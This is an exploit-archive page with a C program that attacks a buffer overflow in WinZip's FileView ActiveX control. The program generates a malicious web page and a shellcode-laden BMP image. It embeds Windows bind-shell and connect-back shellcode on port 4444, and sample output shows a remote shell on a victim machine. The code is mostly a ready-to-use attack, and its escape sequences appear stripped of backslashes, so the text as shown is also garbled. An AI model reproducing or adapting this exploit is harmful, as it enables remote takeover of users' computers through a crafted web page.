[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WinZIP <= 10.0.7245 (FileView ActiveX) Remote Buffer Overflow Exploit
# Published : 2006-11-15
# Author : prdelka
# Previous Title : MS Windows NetpManageIPCConnect Stack Overflow Exploit (MS06-070)
# Next Title : Links 1.00pre12 (smbclient) Remote Code Execution Exploit
/* WinZip <= 10.0.7245 FileView ActiveX buffer overflow exploit
* ============================================================
* A vulnerability has been identified within Winzip that allows remote
* attackers to execute arbitrary code. User interaction is required to
* exploit this vulnerability in that the target must visit a malicious
* web page. The flaw exists within "FileView" ActiveX control which
* contains stack based overflow conditions. This exploit generates a
* malicious html page and contains shellcode embedded within an image
* file. Due to the random nature of the heap, this exploit uses hard
* coded location of the image bytes within the heap and as such is
* unreliable in exploitation of this bug, but has approximately 1 in
* 6 hit ratio within the tested environment.
*
* Example.
* $ ./prdelka-vs-MS-winzip -f index.html -i foo.bmp -s 0 -t 0
* [ WinZip <= 10.0.7245 FileView ActiveX overflow exploit
* [ Using shellcode 'Win32 x86 bind() shellcode (4444/tcp default)' (400 bytes)
* [ Using target 'WinXP SP2(en) WinZIP 10.0.6667'
* [ Creating image containing shellcode 'foo.bmp'
* [ Creating html exploit page 'index.html'
* $
* ... clicky clicky MSIE ...
* $ telnet 192.168.1.223 4444
* Connected to 192.168.1.223.
* Escape character is '^]'.
*
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:Documents and SettingsUserDesktop>
*
* - prdelka
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <getopt.h>
#define NOPSIZE 999999
struct target {
char* name;
int retaddr;
};
struct shellcode {
char* name;
short port;
int host;
char* shellcode;
};
int targetno = 1;
struct target targets[] = {
{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
};
int shellno = 2;
struct shellcode shellcodes[] = {
{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
"x48x40xf5x49xd6x4axf9x91x47x96x2fxf8x9bx37x41xf5"
"x99x47xf9xf9xfcxf9x48x4ex4bx9bx90x9bxf5x97x40xf9"
"xd6x41xf9x48x9bx92xfdx9bx49x42x4fx9fx90xd6x27x9b"
"x93x46x2fx90xfdx4ax6ax51x59xd9xeexd9x74x24xf4x5b"
"x81x73x13xbcxe8x2bx27x83xebxfcxe2xf4x3dx2cx7fxd5"
"x43x17xd7x4dx57xa5xc3xdex43x17xd4x47x37x84x0fx03"
"x37xadx17xacxc0xedx53x26x53x63x64x3fx37xb7x0bx26"
"x57xa1xa0x13x37xe9xc5x16x7cx71x87xa3x7cx9cx2cxe6"
"x76xe5x2axe5x57x1cx10x73x98xc0x5exc2x37xb7x0fx26"
"x57x8exa0x2bxf7x63x74x3bxbdx03x28x0bx37x61x47x03"
"xa0x89xe8x16x67x8cxa0x64x8cx63x6bx2bx37x98x37x8a"
"x37xa8x23x79xd4x66x65x29x50xb8xd4xf1xdaxbbx4dx4f"
"x8fxdax43x50xcfxdax74x73x43x38x43xecx51x14x10x77"
"x43x3ex74xaex59x8exaaxcaxb4xeax7ex4dxbex17xfbx4f"
"x65xe1xdex8axebx17xfdx74xefxbbx78x74xffxbbx68x74"
"x43x38x4dx4fxadxb4x4dx74x35x09xbex4fx18xf2x5bxe0"
"xebx17xfdx4dxacxb9x7exd8x6cx80x8fx8ax92x01x7cxd8"
"x6axbbx7exd8x6cx80xcex6ex3axa1x7cxd8x6axb8x7fx73"
"xe9x17xfbxb4xd4x0fx52xe1xc5xbfxd4xf1xe9x17xfbx41"
"xd6x8cx4dx4fxdfx85xa2xc2xd6xb8x72x0ex70x61xccx4d"
"xf8x61xc9x16x7cx1bx81xd9xfexc5xd5x65x90x7bxa6x5d"
"x84x43x80x8cxd4x9axd5x94xaax17x5ex63x43x3ex70x70"
"xeexb9x7ax76xd6xe9x7ax76xe9xb9xd4xf7xd4x45xf2x22"
"x72xbbxd4xf1xd6x17xd4x10x43x38xa0x70x40x6bxefx43"
"x43x3ex79xd8x6cx80x55xffx5ex9bx78xd8x6ax17xfbx27"},
{"Win32 x86 connect() shellcode (4444/tcp default)",167,160,
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x43x53x43x53xffxd0x68"
"x01x02x03x04x66x68x11x5cx66x53x89xe1x95x68xecxf9"
"xaax60x57xffxd6x6ax10x51x55xffxd0x66x6ax64x66x68"
"x63x6dx6ax50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3"
"xaax95x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab"
"x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51"
"x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xffxd6"
"x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04xffxd6"
"xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"}
};
char html1[]="<HTML>rn<HEAD>rn<TITLE></TITLE>rn</HEAD>rn"
"<BODY>rn<SCRIPT LANGUAGE="VBScript">rnSub WZ"
"FILEVIEW_OnAfterItemAdd(Item)rnWZFILEVIEW.FilePa"
"ttern = ""; /* smash the stack here */
char html2[]=""rnend subrn</SCRIPT>rn<IMG SRC="";
char html3[]="">rn<OBJECT ID="WZFILEV"
"IEW" WIDTH=200 HEIGHT=200rnCLASSID="CLSID:A09A"
"E68F-B14D-43ED-B713-BA413F034904">rn</OBJECT>r"
"n</BODY>rn</HTML>rn";
char bmphdr[]="x42x4dx3exbbx2dx00x00x00x00x00x36x00x00"
"x00x28x00x00x00xe7x03x00x00xe7x03x00x00"
"x01x00x18x00x00x00x00x00x08xbbx2dx00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00";
int ret;
void help(char* progname){
int count;
printf("[ Usage instructions.n[n");
printf("[ %s <required> (optional)n[n[ --filename|-f <file.html>n",progname);
printf("[ --imgname|-i <image.bmp>n[ --shellcode|-s <shell#>n");
printf("[ --shellport|-p (port)n");
printf("[ --shellhost|-i (ip)n");
printf("[ --target|-t <target#/0xretaddr>n[n");
printf("[ Target#'sn");
for(count = 0;count <= targetno - 1;count++){
printf("[ %d %s 0x%xn",count,targets[count],targets[count]);
}
printf("[n[ Shellcode#'sn");
for(count = 0;count <= shellno - 1;count++){
printf("[ %d "%s" (length %d bytes)n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode));
}
exit(0);
}
void setret(char* retarg){
int value = atoi(retarg);
switch(value){
case 0:
printf("[ Using target '%s'n",targets[ret].name);
ret = targets[ret].retaddr;
break;
default:
ret = strtoul(retarg,NULL,16);
printf("[ Using return address '0x%x'n",ret);
break;
}
}
int main(int argc, char* argv[]){
unsigned long i, fd;
int c, index, payg, paya, lhost;
short shellport, shellport2;
int ishell = 0, itarg = 0;
char *buffer, *file, *img, *payload;
static struct option options[] = {
{"filename", 1, 0, 'f'},
{"imgname", 1, 0, 'i'},
{"target", 1, 0, 't'},
{"shellcode", 1, 0, 's'},
{"shellport", 1, 0, 'p'},
{"shellhost", 1, 0, 'd'},
{"help", 0, 0,'h'}
};
printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploitn");
while(c != -1){
c = getopt_long(argc,argv,"f:i:t:s:p:d:h",options,&index);
switch(c){
case 'f':
file = optarg;
break;
case 'i':
img = optarg;
break;
case 't':
itarg = 1;
setret(optarg);
if(strlen((char*)&ret) < 4){
fprintf(stderr,"[ Selected target contains a null address!n");
exit(-1);
}
break;
case 's':
if(ishell==0){
payg = atoi(optarg);
switch(payg){
case 0:
printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
payload = malloc(strlen(shellcodes[payg].shellcode)+1);
memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
shellport2 = 4444;
ishell = 1;
break;
case 1:
printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
payload = malloc(strlen(shellcodes[payg].shellcode)+1);
memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
shellport2 = 4444;
ishell = 1;
break;
default:
printf("[ Invalid shellcode selection %dn",payg);
exit(0);
break;
}
}
break;
case 'p':
if(ishell==1){
if(shellcodes[payg].port > -1){
paya = strlen(payload);
shellport = atoi(optarg);
shellport2 = shellport;
shellport =(shellport&0xff)<<8 | shellport>>8;
memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport));
if(paya > strlen(payload)) {
printf("[ Error shellcode port introduces null bytesn");
exit(1);
}
printf("[ Shellcode port changed to '%u'n",atoi(optarg));
}
else{
printf("[ (%s) port selection is ignored for current shellcoden",optarg);
}
}
else{
printf("[ No shellcode selected yet, ignoring (%s) port selectionn",optarg);
}
break;
case 'd':
if(ishell==1){
if(shellcodes[payg].host > -1){
paya = strlen(payload);
lhost = inet_addr(optarg);
memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost));
if(paya > strlen(payload)){
printf("[ Error shellhost introduces null bytesn");
exit(1);
}
printf("[ Shellhost has been changed to '%s'n",optarg);
}
else{
printf("[ (%s) shellhost selection is ignored for current shellcoden",optarg);
}
}
else {
printf("[ No shellcode selected yet, ignoring (%s) shellhost selectionn",optarg);
}
break;
case 'h':
help(argv[0]);
break;
default:
break;
}
}
if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){
printf("[ Error insufficient arguements, try running '%s --help'n",argv[0]);
exit(0);
}
// create image
printf("[ Creating image containing shellcode '%s'n",img);
fd = open(img,O_RDWR|O_CREAT,S_IRWXU);
if(fd == -1){
fprintf(stderr,"[ Error creating %sn",file);
exit(-1);
}
write(fd,bmphdr,sizeof(bmphdr));
for(i = 0;i < NOPSIZE;i++){
write(fd,"x90",1);
}
write(fd,payload,strlen(payload));
close(fd);
// create html
printf("[ Creating html exploit page '%s'n",file);
fd = open(file,O_RDWR|O_CREAT,S_IRWXU);
if(fd == -1){
fprintf(stderr,"[ Error creating %sn",file);
exit(-1);
}
write(fd,html1,strlen(html1));
for(i = 0;i < 265;i++){
write(fd,"A",1);
}
write(fd,&ret,4);
for(i = 0;i < 1827;i++){
write(fd,"A",1);
}
write(fd,html2,strlen(html2));
write(fd,img,strlen(img));
write(fd,html3,strlen(html3));
close(fd);
}
// www.Syue.com [2006-11-15]